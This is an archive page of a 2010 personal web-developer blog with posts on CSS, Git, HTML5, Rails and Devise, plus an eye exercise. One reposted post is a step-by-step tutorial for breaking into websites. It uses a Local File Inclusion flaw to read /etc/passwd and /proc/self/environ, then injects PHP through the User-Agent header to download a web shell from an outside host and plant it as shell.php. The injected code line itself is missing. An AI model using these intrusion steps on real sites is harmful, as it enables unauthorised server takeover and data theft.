Tuesday, December 7, 2010
Monday, December 6, 2010
Monday, November 22, 2010
Pure CSS GUI icons (experimental)
i didn't know css can make such icons, only I found out during my research :) Pure CSS GUI icons
Wednesday, November 17, 2010
I got interested on this => Shell via LFI - proc/self/environ method
>> 1 - Introduction
In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.Is a step by step tutorial.
>> 2 - Finding LFI
- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.
www.website.com/view.php?page=contact.php
- Now lets replace contact.php with ../ so the URL will become
www.website.com/view.php?page=../
and we got an error
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337big chances to have a Local File Inclusion vulnerability.Let's go to next step.
- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :
www.website.com/view.php?page=../../../etc/passwd
we got error and no etc/passwd file
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337so we go more directories up
www.website.com/view.php?page=../../../../../etc/passwd
we succesfully included the etc/passwd file.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin>> 3 - Checking if proc/self/environ is accessible
- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ
www.website.com/view.php?page=../../../../../proc/self/environ
If you get something like
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
>> 4 - Injecting malicious code
- Now let's inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :
www.website.com/view.php?page=../../../../../proc/self/environ
Choose Tamper and in User-Agent filed write the following code :
Then submit the request.
Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the
website directory) through system(), and our shell will be created.If don't work,try exec() because system() can be disabled on the webserver from php.ini.
>> 5 - Access our shell
- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.
www.website.com/shell.php
Our shell is there.Injection was succesfully.
>> 6 - Shoutz
Shoutz to all members of www.insecurity-ro.org and www.h4cky0u.org.
Tuesday, November 9, 2010
Sunday, November 7, 2010
Git cheat sheets
My new cheat sheets
Global setup:
Download and install Git git config --global user.name "Your Name" git config --global user.email ajcubeta@gmail.com
Next steps:
mkdir mongoidtest cd mongoidtest git init touch README git add README git commit -m 'first commit' git remote add origin git@github.com:ajcubeta/mongoidtest.git git push origin master
Existing Git Repo?
cd existing_git_repo git remote add origin git@github.com:ajcubeta/mongoidtest.git git push origin master
Importing a Subversion Repo?
Click here
When you're done:
Continue
Tuesday, November 2, 2010
Generate a HTML5 Framework with SwitchToHTML5
HTML5 is the new kid on the block, sure, and with reports that an official specification wont be fully completed and officially supported until2022, you may be wondering why you should use it in your new site.
Well, there's one main reason (for me at least), and that is: The Future. The simple fact is that HTML4/XHTML1.0/CSS2 are outdated, and the new XHTML 2 standard has been scrapped in favor of HTML5. CSS3 is gaining more and more momentum every single day, the future of the web is HTML5.
That's also the main reason I've made this site. Usability, When I'm creating new websites or converting old ones to a new language, I find that a framework is a very handy thing to have, so I made this script, which is written in PHP, and provides me with a usable HTML5 framework every single time. I decided to make it web accessible as I figured that others may find it useful too, so enjoy!
http://freehtml5templates.com/shopfashion-html5-and-css3-template/
Tuesday, October 12, 2010
Yoga for the eye
Here's an ancient yoga exercise that you can use to stretch your eyes.
1 . Close your eyes, and relax your eyelids, forehead and face. Keep your neck and head still. Breathe easily and regularly.
2. Imagine you're facing a clock, with your nose at its centre. As you stretch your eyes all the way up, you can just barely see the number 12 at the top of this imaginary clock. (Remember, your eyes are closed.) Starting at 12, rotate your eyes clockwise in a circular motion, around the clock. Stretch your eyes as you rotate them, but don't strain or force the movements.
3. Repeat for 10 to 20 clockwise circles.
4. Change direction and make 10 to 20 circles in a counter-clockwise direction.
Most people carry at least some tension and rigidity in these muscles. You can tell this when:
* Your eyes unconsciously jump out of your control.
* During sections of the rotation, the movements feel stiffer, more tense or stuck.
Holding your breath is a sign of tension. Remember to breathe! Where in the movements did your muscles tense up? When did they jump out of control? What parts of the movements were not smooth? With practice, you'll be able to make all parts of the circular movement smooth and easy.
By itself, this eye stretch won't give you perfect vision, but it definitely has its place in a total system of vision improvement.
1 . Close your eyes, and relax your eyelids, forehead and face. Keep your neck and head still. Breathe easily and regularly.
2. Imagine you're facing a clock, with your nose at its centre. As you stretch your eyes all the way up, you can just barely see the number 12 at the top of this imaginary clock. (Remember, your eyes are closed.) Starting at 12, rotate your eyes clockwise in a circular motion, around the clock. Stretch your eyes as you rotate them, but don't strain or force the movements.
3. Repeat for 10 to 20 clockwise circles.
4. Change direction and make 10 to 20 circles in a counter-clockwise direction.
Most people carry at least some tension and rigidity in these muscles. You can tell this when:
* Your eyes unconsciously jump out of your control.
* During sections of the rotation, the movements feel stiffer, more tense or stuck.
Holding your breath is a sign of tension. Remember to breathe! Where in the movements did your muscles tense up? When did they jump out of control? What parts of the movements were not smooth? With practice, you'll be able to make all parts of the circular movement smooth and easy.
By itself, this eye stretch won't give you perfect vision, but it definitely has its place in a total system of vision improvement.
Thursday, July 8, 2010
Devise Authentication Test deployed at Heruko
Last wednesday 07/07/2010 I managed to deploy my new sample Devise Tool in Rails 3.0 application :) and i'm quite happy successfully deployed it at Heroku | a Ruby Cloud Platform as a Service. The name of my app is http://deviseauthtest.heroku.com/.
Its basically a sample authentication with a lot of feature and minimum code experience behind because the GEM already set it all for me. This Gem composed already 11 modules that will able to use inside the Model called User in my case. It has 11 modules namely (Database Authenticatable, Token Authenticatable, Confirmable, Recoverable, Registerable, Rememberable, Trackable, Timeoutabl, Validatable, Lockable) and so far I don't have any question and problems when I tried to manage modifying the looks and feel of the niffty Generator authored by Ryan Bates from Railscasts :)
It's kindda pretty though as it's very simple to use. Go try it yourself and see the difference running this cool Gem compare to just creating a User Model authentications inside your system w/ not much security compared to this well modularized toolkit at gitHub called "Devise".
My next plan is to try another PDF gem file named PDFkit ... else I have to stick on Prawn of RfPDF.
see you next time ;) andre
Its basically a sample authentication with a lot of feature and minimum code experience behind because the GEM already set it all for me. This Gem composed already 11 modules that will able to use inside the Model called User in my case. It has 11 modules namely (Database Authenticatable, Token Authenticatable, Confirmable, Recoverable, Registerable, Rememberable, Trackable, Timeoutabl, Validatable, Lockable) and so far I don't have any question and problems when I tried to manage modifying the looks and feel of the niffty Generator authored by Ryan Bates from Railscasts :)
It's kindda pretty though as it's very simple to use. Go try it yourself and see the difference running this cool Gem compare to just creating a User Model authentications inside your system w/ not much security compared to this well modularized toolkit at gitHub called "Devise".
My next plan is to try another PDF gem file named PDFkit ... else I have to stick on Prawn of RfPDF.
see you next time ;) andre
Monday, June 28, 2010
For a record on installing Rails 2.x compare and later turning back to Rails3.0BETA
I'm install new DB in my machine PostgreSQL as I want to test compare with my previous on-plate DB Mysql. I was still covering the backup of my files and I notice a link that is quite important so I did this for a record the.
http://www.robbyonrails.com/articles/2008/01/22/installing-ruby-on-rails-and-postgresql-on-os-x-third-edition
I'll post if I got a bug and errors as I go along the way then.
http://www.robbyonrails.com/articles/2008/01/22/installing-ruby-on-rails-and-postgresql-on-os-x-third-edition
I'll post if I got a bug and errors as I go along the way then.
Sunday, June 27, 2010
How stupid I am deleting my Terminal App!
From this article http://www.ruby-forum.com/topic/212116#921458 (Thanks to a friend Frank for helping me sorting out my problem on an Error installing gems for Rails 3.0.0.beta4 in MacOSx machine)
Following the steps makes it work in the specific directory but the root directory has some problems with it. So decided to follow and edit the bash_profile which I accidentally modify few lines of it that my Bash Terminal Commands wont' work anymore, it says ... "-Bash ___ command not found." (whoami, ls, cat, tail, etc.,.). How stupid I am moving the Terminal app in the Desktop and move it to Trash and make the Trash Empty just to let my machine work back to where it was supposed to be working. The problem now, while i'm trying to fix the command line now which is found under /usr/bin, It wont work now, so that's it the TERMINAL was removed from my machine :( ... "How stupid I am..." Its the most important thing "app" that I need to work on few web apps :( . Now i'm worried as to where to resolve this issue. The only solution I could think is to get the CD 10.6x in the office and reinstall it back here. So i'm stranded for the rest of the weekends and few hours before and after weekends :(. So that's it. I'll better play and watch movie this time. See you then tomorrow.
Following the steps makes it work in the specific directory but the root directory has some problems with it. So decided to follow and edit the bash_profile which I accidentally modify few lines of it that my Bash Terminal Commands wont' work anymore, it says ... "-Bash ___ command not found." (whoami, ls, cat, tail, etc.,.). How stupid I am moving the Terminal app in the Desktop and move it to Trash and make the Trash Empty just to let my machine work back to where it was supposed to be working. The problem now, while i'm trying to fix the command line now which is found under /usr/bin, It wont work now, so that's it the TERMINAL was removed from my machine :( ... "How stupid I am..." Its the most important thing "app" that I need to work on few web apps :( . Now i'm worried as to where to resolve this issue. The only solution I could think is to get the CD 10.6x in the office and reinstall it back here. So i'm stranded for the rest of the weekends and few hours before and after weekends :(. So that's it. I'll better play and watch movie this time. See you then tomorrow.
Wednesday, June 23, 2010
Working on CSS3 in tandem with HTML5 as my next project
Few of my checklist that needs to be read and at the same time work on new stuff are: (tutorialfeed for CSS2 vs CSS3, css3.info, diveintohtml5, rubyinside)
The TutorialFeed is differentiates CSS2 Between CSS3 (http://www.tutorialfeed.org/2009/02/difference-between-css2-and-css3.html) is basically additional knowledge for me on working with CSS2 vs CSS3, they they differ on few additional attributes at least I have few to work and test on. Also another site that I'm interested with is how the CSS3 working with different latest browsers
(http://www.css3.info/wp-content/uploads/2007/07/css3_support.htm), this will help me detect few incompatibilities when developing web applications that running on css3 and working the markup language. I also have few reviews on (http://diveintohtml5.org/) which is helpful when diving markup language like HTML5 ... i'll be working on Web Application sooner. And lastly I'm check on this site (http://www.rubyinside.com/nethttp-cheat-sheet-2940.html) might be testing out on .erb file sampling on Net::HTTP cheat sheet. I'm new to this so, this is quite exciting for me though. See you then :) ... my 1st blog post @ Blogger.com
Subscribe to:
Posts (Atom)